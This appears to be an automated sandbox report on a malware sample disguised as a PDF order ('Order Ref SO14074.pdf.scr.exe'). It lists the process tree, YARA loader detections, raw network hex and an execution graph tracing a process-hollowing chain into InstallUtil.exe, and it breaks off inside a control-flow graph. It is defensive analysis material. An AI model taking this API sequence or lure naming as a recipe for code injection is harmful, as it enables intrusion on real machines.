                              2024-11-29 08:36:57 UTC16384INData Raw: 78 d5 38 44 0d 4e 96 bd 88 b4 0d be 9a 04 6a e9 79 83 1c 78 de be fb 71 be 84 62 a4 c0 42 85 36 97 8b d1 79 f5 8c d8 ec 0f b9 86 66 26 9e 7a 00 a5 cc 5e 8b 89 f8 77 5d 30 cf 5e 78 91 6d 5f 19 60 46 59 de 3a 8e 6f 92 4b c3 05 7d 2b 77 2e d0 95 8b f6 65 39 68 94 02 c1 50 36 75 eb b1 5d 52 62 8e cb b9 8b e0 25 3c 26 cf 1d 05 ba 50 ac b0 58 3c 5d 1d ec 51 4a de 15 44 d1 73 7e 48 8d e1 80 ab cc 0c a7 42 90 3f 95 a0 7e 00 6d 20 f8 75 34 2a d7 0f 64 de 7b 80 19 9b d8 19 40 74 2b 6f 75 62 8f 24 bb 19 1a 6b 32 70 3b 7a dd 41 57 cb e6 ad a0 2f d8 17 91 59 60 e9 f8 1d df 12 06 28 2a aa 4f 94 e1 7c a7 44 6c 57 18 d4 15 38 6d 11 10 0f e3 b2 ae d6 0a 0d db 57 85 07 fa fb f8 59 28 77 cd e8 54 3e 4b 36 af 2f 4b 98 45 19 ca 87 62 29 9c b1 64 5a 86 36 07 9e e1 d7 2f 27 b9
                              Data Ascii: x8DNjyxqbB6yf&z^w]0^xm_`FY:oK}+w.e9hP6u]Rb%<&PX<]QJDs~HB?~m u4*d{@t+oub$k2p;zAW/Y`(*O|DlW8mWY(wT>K6/KEb)dZ6/'
                              2024-11-29 08:36:57 UTC16384INData Raw: e5 47 fa 63 5d b3 38 60 9e 9e 91 b6 c0 2b 70 b3 e2 60 bc fd a1 da 05 d5 0d 08 92 88 f9 a5 08 c8 60 3c 7b ef 49 2d 73 22 a5 84 20 92 c2 31 6b 6c 69 d9 dc 0c f8 c1 0c 6f 4a c4 77 c3 93 2a a0 a3 2d 13 65 58 3a 33 bb 4f 7b 79 c1 63 39 62 86 9b e6 a3 74 cf 90 59 8e c6 55 e1 52 f0 b3 fa 05 67 bd 45 b7 b2 10 7c d3 b8 dd 31 92 2d 1f 19 ab 15 0e ac 64 f3 de cf 79 d1 a1 da 6b f7 18 f7 56 3e 66 91 b6 0f 47 68 1e e0 b3 5d fb ee 70 d6 70 8c a9 76 b5 bf 10 b4 c1 95 8e 7b 81 35 1d d7 52 b7 08 58 48 22 0d 57 b5 f5 ea 88 88 9c 3c 02 fa 76 69 f2 de 23 f0 11 6f f6 4f e5 b6 e5 e2 23 3f e8 47 6e 96 3a 00 f6 bf d4 b4 97 0c 4d 9c 83 f1 8f 31 6a d1 a9 e0 55 e6 41 14 58 7e 34 e7 17 ab 7c 13 cf f2 fb d7 ea 90 d9 af 98 8b 21 f1 55 de fd f7 f3 4b 7b 3b 49 33 2d 8f 37 ae 62 31 09 aa
                              Data Ascii: Gc]8`+p``<{I-s" 1klioJw*-eX:3O{yc9btYURgE|1-dykV>fGh]ppv{5RXH"W<vi#oO#?Gn:M1jUAX~4|!UK{;I3-7b1
                              2024-11-29 08:36:57 UTC16384INData Raw: 71 0f ae a8 64 0d 35 4f 22 c3 7b f4 33 b3 36 6e cf fc 81 fd 9f 01 11 10 49 40 ac 3f 88 3b e4 8f db 4f 3f cc e5 cc 6c 71 60 00 e9 a7 e5 4c 22 fd 9d 31 fc ae cb a9 d0 98 41 4c df bd 93 d2 6b de a0 45 02 35 4d 6c d0 5e 89 25 e1 8a e8 ee 46 27 b7 b7 b7 cb 56 5e 91 24 e0 9f 9a 82 15 d6 75 60 b0 a0 4f dc 40 c8 dd 9b 4f 99 01 82 e0 1b 02 d9 12 d2 d4 a7 da 85 d5 3f 1a a9 2b ac d2 8e 50 39 ed 96 df 73 8f db f8 a5 50 5d 35 97 f2 25 9b 59 8d dd 5c 43 40 9f af 8e b5 f2 d7 c2 8f e4 05 25 35 ba 0c ce 39 8d a3 43 06 8e a9 85 49 7a 81 dd 5e 11 b5 df 4f b4 c1 2e c5 85 dd cd c1 f2 12 6f 1e 9a 2b 1d 4e 70 12 92 bc 8c ee ea 95 8f 78 04 c5 68 f8 19 51 76 af fd ed 02 64 17 69 3b 85 f4 15 49 5b 77 58 57 53 25 62 8d da f6 3a 3c 45 8a cd 0a 3f 20 38 89 e9 b7 c3 e5 59 d8 ac 40 2a
                              Data Ascii: qd5O"{36nI@?;O?lq`L"1ALkE5Ml^%F'V^$u`O@O?+P9sP]5%Y\C@%59CIz^O.o+NpxhQvdi;I[wXWS%b:<E? 8Y@*


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:03:36:51
                              Start date:29/11/2024
                              Path:C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe"
                              Imagebase:0x990000
                              File size:11'264 bytes
                              MD5 hash:88329160BF478A825A9B4BCB310961AE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2208868060.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2182484320.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:03:37:09
                              Start date:29/11/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              Imagebase:0xfb0000
                              File size:42'064 bytes
                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:6
                              Start time:03:37:10
                              Start date:29/11/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1144
                              Imagebase:0x6c0000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:10%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:3.2%
                                Total number of Nodes:285
                                Total number of Limit Nodes:13
                                execution_graph 66382 70df908 66383 70df948 VirtualAlloc 66382->66383 66385 70df982 66383->66385 66478 650a5f6 66479 650a600 66478->66479 66483 7194418 66479->66483 66488 7194428 66479->66488 66480 650a56f 66484 719443d 66483->66484 66493 7194468 66484->66493 66498 7194458 66484->66498 66485 7194453 66485->66480 66489 719443d 66488->66489 66491 7194458 2 API calls 66489->66491 66492 7194468 2 API calls 66489->66492 66490 7194453 66490->66480 66491->66490 66492->66490 66494 7194492 66493->66494 66495 719465b 66494->66495 66503 7197a40 66494->66503 66507 7197a48 66494->66507 66495->66485 66500 7194468 66498->66500 66499 719465b 66499->66485 66500->66499 66501 7197a48 SleepEx 66500->66501 66502 7197a40 SleepEx 66500->66502 66501->66500 66502->66500 66504 7197a48 SleepEx 66503->66504 66506 7197ac6 66504->66506 66506->66494 66508 7197a88 SleepEx 66507->66508 66510 7197ac6 66508->66510 66510->66494 66511 2a7cc10 DuplicateHandle 66512 2a7cca6 66511->66512 66704 2a7c5c0 66705 2a7c606 GetCurrentProcess 66704->66705 66707 2a7c651 66705->66707 66708 2a7c658 GetCurrentThread 66705->66708 66707->66708 66709 2a7c695 GetCurrentProcess 66708->66709 66710 2a7c68e 66708->66710 66711 2a7c6cb 66709->66711 66710->66709 66712 2a7c6f3 GetCurrentThreadId 66711->66712 66713 2a7c724 66712->66713 66754 2a74550 66755 2a74560 66754->66755 66756 2a740e0 GetModuleHandleW 66755->66756 66757 2a74565 66756->66757 66386 72290a8 66387 72290f6 NtProtectVirtualMemory 66386->66387 66389 7229140 66387->66389 66714 650a83a 66715 650a844 66714->66715 66720 7197d10 66715->66720 66726 7197cd0 66715->66726 66731 7197ce0 66715->66731 66716 650a882 66721 7197d16 66720->66721 66722 7197cdf 66720->66722 66736 7197e9a 66722->66736 66741 7197dbb 66722->66741 66723 7197d0b 66723->66716 66727 7197cf5 66726->66727 66729 7197dbb 2 API calls 66727->66729 66730 7197e9a 2 API calls 66727->66730 66728 7197d0b 66728->66716 66729->66728 66730->66728 66732 7197cf5 66731->66732 66734 7197dbb 2 API calls 66732->66734 66735 7197e9a 2 API calls 66732->66735 66733 7197d0b 66733->66716 66734->66733 66735->66733 66738 7197ea0 66736->66738 66737 7197f87 66737->66723 66738->66737 66746 7198b28 66738->66746 66750 7198b22 66738->66750 66742 7197dda 66741->66742 66743 7197f87 66742->66743 66744 7198b28 VirtualProtect 66742->66744 66745 7198b22 VirtualProtect 66742->66745 66743->66723 66744->66742 66745->66742 66747 7198b70 VirtualProtect 66746->66747 66749 7198bab 66747->66749 66749->66738 66751 7198b28 VirtualProtect 66750->66751 66753 7198bab 66751->66753 66753->66738 66513 650a96c 66514 650a976 66513->66514 66518 719fc08 66514->66518 66522 719fbf9 66514->66522 66515 650a9b4 66519 719fc1d 66518->66519 66520 719fc33 66519->66520 66526 7220504 66519->66526 66520->66515 66523 719fc08 66522->66523 66524 719fc33 66523->66524 66525 7220504 10 API calls 66523->66525 66524->66515 66525->66524 66527 722050a 66526->66527 66531 7221b08 66527->66531 66535 7221b18 66527->66535 66532 7221b18 66531->66532 66539 72220b6 66532->66539 66536 7221b2d 66535->66536 66538 72220b6 10 API calls 66536->66538 66537 7220669 66538->66537 66540 72220e5 66539->66540 66541 7221bd3 66539->66541 66545 7222581 66540->66545 66559 7222590 66540->66559 66542 7222110 66546 7222590 66545->66546 66573 7222f43 66546->66573 66578 72239ed 66546->66578 66583 722343f 66546->66583 66589 7222dfc 66546->66589 66594 7222a45 66546->66594 66599 722364e 66546->66599 66604 72229c4 66546->66604 66609 7223954 66546->66609 66614 72237c1 66546->66614 66619 7222b96 66546->66619 66624 72228f2 66546->66624 66547 72225c7 66547->66542 66560 72225a5 66559->66560 66562 72228f2 2 API calls 66560->66562 66563 7222f43 2 API calls 66560->66563 66564 72237c1 2 API calls 66560->66564 66565 7222b96 2 API calls 66560->66565 66566 72229c4 2 API calls 66560->66566 66567 7223954 2 API calls 66560->66567 66568 7222a45 2 API calls 66560->66568 66569 722364e 2 API calls 66560->66569 66570 722343f 2 API calls 66560->66570 66571 7222dfc 2 API calls 66560->66571 66572 72239ed 2 API calls 66560->66572 66561 72225c7 66561->66542 66562->66561 66563->66561 66564->66561 66565->66561 66566->66561 66567->66561 66568->66561 66569->66561 66570->66561 66571->66561 66572->66561 66574 7222f52 66573->66574 66629 722ab98 66574->66629 66633 722ab90 66574->66633 66575 7222feb 66579 722264c 66578->66579 66580 7222b96 66578->66580 66579->66547 66637 722a900 66580->66637 66641 722a8f9 66580->66641 66584 722264c 66583->66584 66585 7222a45 66583->66585 66584->66547 66647 722b610 66585->66647 66651 722b608 66585->66651 66586 7222aa7 66590 7222e0b 66589->66590 66592 722ab90 WriteProcessMemory 66590->66592 66593 722ab98 WriteProcessMemory 66590->66593 66591 722264c 66591->66547 66592->66591 66593->66591 66595 7222a4f 66594->66595 66597 722b610 NtResumeThread 66595->66597 66598 722b608 NtResumeThread 66595->66598 66596 7222aa7 66597->66596 66598->66596 66600 7223654 66599->66600 66655 722a2e8 66600->66655 66659 722a2f0 66600->66659 66601 722368b 66605 72229d3 66604->66605 66607 722a2f0 Wow64SetThreadContext 66605->66607 66608 722a2e8 Wow64SetThreadContext 66605->66608 66606 72229ff 66607->66606 66608->66606 66610 722264c 66609->66610 66611 7222bbc 66609->66611 66610->66547 66612 722a900 VirtualAllocEx 66611->66612 66613 722a8f9 VirtualAllocEx 66611->66613 66612->66610 66613->66610 66615 72237d9 66614->66615 66663 7223ee8 66615->66663 66668 7223ed8 66615->66668 66616 72237f1 66620 7222ba0 66619->66620 66622 722a900 VirtualAllocEx 66620->66622 66623 722a8f9 VirtualAllocEx 66620->66623 66621 722264c 66621->66547 66622->66621 66623->66621 66625 72228f8 66624->66625 66627 722ab90 WriteProcessMemory 66625->66627 66628 722ab98 WriteProcessMemory 66625->66628 66626 722264c 66626->66547 66627->66626 66628->66626 66630 722abe0 WriteProcessMemory 66629->66630 66632 722ac37 66630->66632 66632->66575 66634 722ab98 WriteProcessMemory 66633->66634 66636 722ac37 66634->66636 66636->66575 66638 722a940 VirtualAllocEx 66637->66638 66640 722a97d 66638->66640 66640->66579 66642 722a947 VirtualAllocEx 66641->66642 66644 722a8fe VirtualAllocEx 66641->66644 66646 722a97d 66642->66646 66644->66646 66646->66579 66648 722b658 NtResumeThread 66647->66648 66650 722b68d 66648->66650 66650->66586 66652 722b60d NtResumeThread 66651->66652 66654 722b68d 66652->66654 66654->66586 66656 722a2f0 Wow64SetThreadContext 66655->66656 66658 722a37d 66656->66658 66658->66601 66660 722a335 Wow64SetThreadContext 66659->66660 66662 722a37d 66660->66662 66662->66601 66664 7223eff 66663->66664 66665 7223f21 66664->66665 66673 72243bc 66664->66673 66678 7224340 66664->66678 66665->66616 66669 7223ee8 66668->66669 66670 7223f21 66669->66670 66671 7224340 2 API calls 66669->66671 66672 72243bc 2 API calls 66669->66672 66670->66616 66671->66670 66672->66670 66674 72243e4 66673->66674 66683 7229b15 66674->66683 66687 7229b20 66674->66687 66679 722434f 66678->66679 66681 7229b20 CreateProcessA 66679->66681 66682 7229b15 CreateProcessA 66679->66682 66680 7223fa5 66681->66680 66682->66680 66684 7229b20 CreateProcessA 66683->66684 66686 7229d0c 66684->66686 66688 7229b84 CreateProcessA 66687->66688 66690 7229d0c 66688->66690 66390 70d0c80 66391 70d0c9a 66390->66391 66392 70d0caa 66391->66392 66396 70d3b1c 66391->66396 66399 70d754a 66391->66399 66403 70d7757 66391->66403 66407 70de4d0 66396->66407 66402 70de4d0 VirtualProtect 66399->66402 66400 70d19f1 66400->66399 66401 70d7571 66400->66401 66402->66400 66404 70d7776 66403->66404 66406 70de4d0 VirtualProtect 66404->66406 66405 70d779d 66406->66405 66409 70de4f7 66407->66409 66411 70de920 66409->66411 66412 70de968 VirtualProtect 66411->66412 66414 70d3b31 66412->66414 66415 2a74528 66416 2a74536 66415->66416 66419 2a73cf4 66416->66419 66418 2a7453f 66420 2a73cff 66419->66420 66423 2a740e0 66420->66423 66422 2a74565 66422->66418 66424 2a740eb 66423->66424 66427 2a740f0 66424->66427 66426 2a74605 66426->66422 66428 2a740fb 66427->66428 66431 2a74224 66428->66431 66430 2a746e2 66430->66426 66432 2a7422f 66431->66432 66435 2a74254 66432->66435 66434 2a747f4 66434->66430 66436 2a7425f 66435->66436 66438 2a777db 66436->66438 66441 2a7a1f8 66436->66441 66437 2a77819 66437->66434 66438->66437 66445 2a7c2e9 66438->66445 66450 2a7a230 66441->66450 66453 2a7a21f 66441->66453 66442 2a7a20e 66442->66438 66446 2a7c319 66445->66446 66447 2a7c33d 66446->66447 66462 2a7c4a8 66446->66462 66466 2a7c49b 66446->66466 66447->66437 66457 2a7a328 66450->66457 66451 2a7a23f 66451->66442 66454 2a7a230 66453->66454 66456 2a7a328 GetModuleHandleW 66454->66456 66455 2a7a23f 66455->66442 66456->66455 66458 2a7a35c 66457->66458 66459 2a7a339 66457->66459 66458->66451 66459->66458 66460 2a7a560 GetModuleHandleW 66459->66460 66461 2a7a58d 66460->66461 66461->66451 66464 2a7c4b5 66462->66464 66463 2a7c4ef 66463->66447 66464->66463 66470 2a7b060 66464->66470 66468 2a7c4a8 66466->66468 66467 2a7c4ef 66467->66447 66468->66467 66469 2a7b060 GetModuleHandleW 66468->66469 66469->66467 66471 2a7b06b 66470->66471 66473 2a7d208 66471->66473 66474 2a7c85c 66471->66474 66475 2a7c867 66474->66475 66476 2a74254 GetModuleHandleW 66475->66476 66477 2a7d277 66476->66477 66477->66473 66691 127d118 66693 127d130 66691->66693 66692 127d18b 66693->66692 66695 70def28 66693->66695 66696 70def50 66695->66696 66699 70df3b8 66696->66699 66697 70def77 66700 70df3e5 66699->66700 66701 70de4d0 VirtualProtect 66700->66701 66703 70df57b 66700->66703 66702 70df56c 66701->66702 66702->66697 66703->66697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,gq$4$$cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
                                • API String ID: 0-2053106459
                                • Opcode ID: 011d82b46bea3710d2859d18bb42bae5c61f25d529e44837b630fea667a3964b
                                • Instruction ID: a0cf06cdd8351f86343555cea0c2938942af4aeb084afcde5d30fa0cf6cff841
                                • Opcode Fuzzy Hash: 011d82b46bea3710d2859d18bb42bae5c61f25d529e44837b630fea667a3964b
                                • Instruction Fuzzy Hash: EAB20974A1021ACFDB28DF94C894BADB7B6BF88700F158199E605AB3A5CB70DD85CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,gq$4$$cq$$cq$$cq$$cq
                                • API String ID: 0-3260025154
                                • Opcode ID: 1ecc56ad961547ca8ff32bc17b20eb4c1ef3a4858db387e19b72736a87240a97
                                • Instruction ID: 85bf7b519fc8a7bcd34d6486077ac3b129e0ee58a68ff9ccbf609c1db1506b4b
                                • Opcode Fuzzy Hash: 1ecc56ad961547ca8ff32bc17b20eb4c1ef3a4858db387e19b72736a87240a97
                                • Instruction Fuzzy Hash: 0322E8B4A1021ACFDB28DFA4C994BADB7B2FF48700F148199D609AB395DB709D85CF50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1129 71a3848-71a3869 1130 71a386b 1129->1130 1131 71a3870-71a3957 1129->1131 1130->1131 1133 71a4059-71a4081 1131->1133 1134 71a395d-71a3a9e 1131->1134 1137 71a4787-71a4790 1133->1137 1178 71a4022-71a404c 1134->1178 1179 71a3aa4-71a3aff 1134->1179 1138 71a408f-71a4099 1137->1138 1139 71a4796-71a47ad 1137->1139 1142 71a409b 1138->1142 1143 71a40a0-71a4194 1138->1143 1142->1143 1160 71a41be 1143->1160 1161 71a4196-71a41a2 1143->1161 1165 71a41c4-71a41e4 1160->1165 1163 71a41ac-71a41b2 1161->1163 1164 71a41a4-71a41aa 1161->1164 1167 71a41bc 1163->1167 1164->1167 1170 71a41e6-71a423f 1165->1170 1171 71a4244-71a42c4 1165->1171 1167->1165 1182 71a4784 1170->1182 1192 71a431b-71a435e 1171->1192 1193 71a42c6-71a4319 1171->1193 1189 71a404e 1178->1189 1190 71a4056 1178->1190 1186 71a3b01 1179->1186 1187 71a3b04-71a3b0f 1179->1187 1182->1137 1186->1187 1191 71a3f37-71a3f3d 1187->1191 1189->1190 1190->1133 1194 71a3f43-71a3fbf 1191->1194 1195 71a3b14-71a3b32 1191->1195 1220 71a4369-71a4372 1192->1220 1193->1220 1236 71a400c-71a4012 1194->1236 1198 71a3b89-71a3b9e 1195->1198 1199 71a3b34-71a3b38 1195->1199 1201 71a3ba0 1198->1201 1202 71a3ba5-71a3bbb 1198->1202 1199->1198 1203 71a3b3a-71a3b45 1199->1203 1201->1202 1207 71a3bbd 1202->1207 1208 71a3bc2-71a3bd9 1202->1208 1204 71a3b7b-71a3b81 1203->1204 1209 71a3b83-71a3b84 1204->1209 1210 71a3b47-71a3b4b 1204->1210 1207->1208 1212 71a3bdb 1208->1212 1213 71a3be0-71a3bf6 1208->1213 1219 71a3c07-71a3c72 1209->1219 1214 71a3b4d 1210->1214 1215 71a3b51-71a3b69 1210->1215 1212->1213 1216 71a3bf8 1213->1216 1217 71a3bfd-71a3c04 1213->1217 1214->1215 1221 71a3b6b 1215->1221 1222 71a3b70-71a3b78 1215->1222 1216->1217 1217->1219 1223 71a3c86-71a3e3b 1219->1223 1224 71a3c74-71a3c80 1219->1224 1226 71a43d2-71a43e1 1220->1226 1221->1222 1222->1204 1234 71a3e9f-71a3eb4 1223->1234 1235 71a3e3d-71a3e41 1223->1235 1224->1223 1227 71a43e3-71a446b 1226->1227 1228 71a4374-71a439c 1226->1228 1264 71a45e4-71a45f0 1227->1264 1231 71a439e 1228->1231 1232 71a43a3-71a43cc 1228->1232 1231->1232 1232->1226 1240 71a3ebb-71a3edc 1234->1240 1241 71a3eb6 1234->1241 1235->1234 1242 71a3e43-71a3e52 1235->1242 1238 71a3fc1-71a4009 1236->1238 1239 71a4014-71a401a 1236->1239 1238->1236 1239->1178 1243 71a3ede 1240->1243 1244 71a3ee3-71a3f02 1240->1244 1241->1240 1246 71a3e91-71a3e97 1242->1246 1243->1244 1250 71a3f09-71a3f29 1244->1250 1251 71a3f04 1244->1251 1248 71a3e99-71a3e9a 1246->1248 1249 71a3e54-71a3e58 1246->1249 1253 71a3f34 1248->1253 1255 71a3e5a-71a3e5e 1249->1255 1256 71a3e62-71a3e83 1249->1256 1257 71a3f2b 1250->1257 1258 71a3f30 1250->1258 1251->1250 1253->1191 1255->1256 1260 71a3e8a-71a3e8e 1256->1260 1261 71a3e85 1256->1261 1257->1258 1258->1253 1260->1246 1261->1260 1265 71a4470-71a4479 1264->1265 1266 71a45f6-71a4651 1264->1266 1267 71a447b 1265->1267 1268 71a4482-71a45d8 1265->1268 1281 71a4688-71a46b2 1266->1281 1282 71a4653-71a4686 1266->1282 1267->1268 1269 71a4488-71a44c8 1267->1269 1270 71a44cd-71a450d 1267->1270 1271 71a4512-71a4552 1267->1271 1272 71a4557-71a4597 1267->1272 1285 71a45de 1268->1285 1269->1285 1270->1285 1271->1285 1272->1285 1290 71a46bb-71a474e 1281->1290 1282->1290 1285->1264 1294 71a4755-71a4775 1290->1294 1294->1182
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204717196.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_71a0000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: Mx]$TJhq$Tecq$pgq$xbfq
                                • API String ID: 0-1963951728
                                • Opcode ID: f5b64078b6067bd1cb1f5f96d05da2372fe58d6b931f48ad171c93566723a259
                                • Instruction ID: 7e0e0ca31d4f2c0b1b9ea8781a6d8392ea1707ca589d71c32b4c4dee17e35d85
                                • Opcode Fuzzy Hash: f5b64078b6067bd1cb1f5f96d05da2372fe58d6b931f48ad171c93566723a259
                                • Instruction Fuzzy Hash: ACA2B475A00228DFDB65CF69C984AD9BBB2FF89300F1581E9D509AB365DB319E81CF40

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1758 71a4b41-71a4b7e 1759 71a4b80 1758->1759 1760 71a4b85-71a4ca7 1758->1760 1759->1760 1764 71a4ccb-71a4cd7 1760->1764 1765 71a4ca9-71a4cbf 1760->1765 1766 71a4cd9 1764->1766 1767 71a4cde-71a4ce3 1764->1767 2042 71a4cc5 call 71a76d0 1765->2042 2043 71a4cc5 call 71a76e0 1765->2043 1766->1767 1768 71a4d1b-71a4d64 1767->1768 1769 71a4ce5-71a4cf1 1767->1769 1779 71a4d6b-71a5030 1768->1779 1780 71a4d66 1768->1780 1771 71a4cf8-71a4d16 1769->1771 1772 71a4cf3 1769->1772 1773 71a647f-71a6485 1771->1773 1772->1771 1775 71a64b0 1773->1775 1776 71a6487-71a64a7 1773->1776 1776->1775 1805 71a5a60-71a5a6c 1779->1805 1780->1779 1806 71a5a72-71a5a88 1805->1806 1807 71a5035-71a5041 1805->1807 1812 71a5a90-71a5aaa 1806->1812 1808 71a5048-71a516d 1807->1808 1809 71a5043 1807->1809 1844 71a516f-71a51a7 1808->1844 1845 71a51ad-71a5236 1808->1845 1809->1808 1815 71a5b84-71a5b8a 1812->1815 1817 71a5aaf-71a5b2c 1815->1817 1818 71a5b90-71a5bc8 1815->1818 1834 71a5b2e-71a5b32 1817->1834 1835 71a5b5f-71a5b81 1817->1835 1828 71a5f26-71a5f2c 1818->1828 1830 71a5bcd-71a5dcf 1828->1830 1831 71a5f32-71a5f7a 1828->1831 1925 71a5e6e-71a5e72 1830->1925 1926 71a5dd5-71a5e69 1830->1926 1841 71a5f7c-71a5fef 1831->1841 1842 71a5ff5-71a6040 1831->1842 1834->1835 1836 71a5b34-71a5b5c 1834->1836 1835->1815 1836->1835 1841->1842 1864 71a6449-71a644f 1842->1864 1844->1845 1870 71a5238-71a5240 1845->1870 1871 71a5245-71a52c9 1845->1871 1866 71a6045-71a60c7 1864->1866 1867 71a6455-71a647d 1864->1867 1885 71a60c9-71a60e4 1866->1885 1886 71a60ef-71a60fb 1866->1886 1867->1773 1874 71a5a51-71a5a5d 1870->1874 1906 71a52cb-71a52d3 1871->1906 1907 71a52d8-71a535c 1871->1907 1874->1805 1885->1886 1887 71a60fd 1886->1887 1888 71a6102-71a610e 1886->1888 1887->1888 1892 71a6110-71a611c 1888->1892 1893 71a6121-71a6130 1888->1893 1894 71a6430-71a6446 1892->1894 1895 71a6139-71a6411 1893->1895 1896 71a6132 1893->1896 1894->1864 1929 71a641c-71a6428 1895->1929 1896->1895 1898 71a622a-71a6293 1896->1898 1899 71a6298-71a6301 1896->1899 1900 71a613f-71a61a8 1896->1900 1901 71a61ad-71a6225 1896->1901 1902 71a6306-71a636e 1896->1902 1898->1929 1899->1929 1900->1929 1901->1929 1936 71a63e2-71a63e8 1902->1936 1906->1874 1950 71a536b-71a53ef 1907->1950 1951 71a535e-71a5366 1907->1951 1932 71a5ecf-71a5f0c 1925->1932 1933 71a5e74-71a5ecd 1925->1933 1948 71a5f0d-71a5f23 1926->1948 1929->1894 1932->1948 1933->1948 1941 71a63ea-71a63f4 1936->1941 1942 71a6370-71a63ce 1936->1942 1941->1929 1955 71a63d0 1942->1955 1956 71a63d5-71a63df 1942->1956 1948->1828 1963 71a53fe-71a5482 1950->1963 1964 71a53f1-71a53f9 1950->1964 1951->1874 1955->1956 1956->1936 1970 71a5491-71a5515 1963->1970 1971 71a5484-71a548c 1963->1971 1964->1874 1977 71a5517-71a551f 1970->1977 1978 71a5524-71a55a8 1970->1978 1971->1874 1977->1874 1984 71a55aa-71a55b2 1978->1984 1985 71a55b7-71a563b 1978->1985 1984->1874 1991 71a564a-71a56ce 1985->1991 1992 71a563d-71a5645 1985->1992 1998 71a56dd-71a5761 1991->1998 1999 71a56d0-71a56d8 1991->1999 1992->1874 2005 71a5763-71a576b 1998->2005 2006 71a5770-71a57f4 1998->2006 1999->1874 2005->1874 2012 71a5803-71a5887 2006->2012 2013 71a57f6-71a57fe 2006->2013 2019 71a5889-71a5891 2012->2019 2020 71a5896-71a591a 2012->2020 2013->1874 2019->1874 2026 71a5929-71a59ad 2020->2026 2027 71a591c-71a5924 2020->2027 2033 71a59af-71a59b7 2026->2033 2034 71a59bc-71a5a40 2026->2034 2027->1874 2033->1874 2040 71a5a4c-71a5a4e 2034->2040 2041 71a5a42-71a5a4a 2034->2041 2040->1874 2041->1874 2042->1764 2043->1764
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204717196.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_71a0000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: 2$$cq
                                • API String ID: 0-1429447105
                                • Opcode ID: 13fe0cce4d0c675d5383f219344802076cf1294e675309b637cdfd1b0aa9aff4
                                • Instruction ID: d8ff3bfb5b60a855fb48b77ffd2e573682135d8e46cea7676540f9a2e8d16773
                                • Opcode Fuzzy Hash: 13fe0cce4d0c675d5383f219344802076cf1294e675309b637cdfd1b0aa9aff4
                                • Instruction Fuzzy Hash: 81E2E5B4A046298FCB64DF68D985B9ABBF6FB89301F5081E9D50DA7384DB345E81CF40

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2044 7225c50-7225c71 2045 7225c73 2044->2045 2046 7225c78-7225d08 call 72267a0 2044->2046 2045->2046 2051 7225d0e-7225d4b 2046->2051 2053 7225d5a 2051->2053 2054 7225d4d-7225d58 2051->2054 2055 7225d64-7225e7f 2053->2055 2054->2055 2066 7225e91-7225ebc 2055->2066 2067 7225e81-7225e87 2055->2067 2068 7226684-72266a0 2066->2068 2067->2066 2069 7225ec1-7226024 call 7224b50 2068->2069 2070 72266a6-72266c1 2068->2070 2081 7226036-72261c7 call 7222438 call 7222278 2069->2081 2082 7226026-722602c 2069->2082 2094 72261c9-72261cd 2081->2094 2095 722622c-7226236 2081->2095 2082->2081 2097 72261d5-7226227 2094->2097 2098 72261cf-72261d0 2094->2098 2096 722645d-722647c 2095->2096 2100 7226482-72264ac 2096->2100 2101 722623b-7226381 call 7224b50 2096->2101 2099 7226502-722656d 2097->2099 2098->2099 2118 722657f-72265ca 2099->2118 2119 722656f-7226575 2099->2119 2107 72264ae-72264fc 2100->2107 2108 72264ff-7226500 2100->2108 2130 7226456-7226457 2101->2130 2131 7226387-7226453 call 7224b50 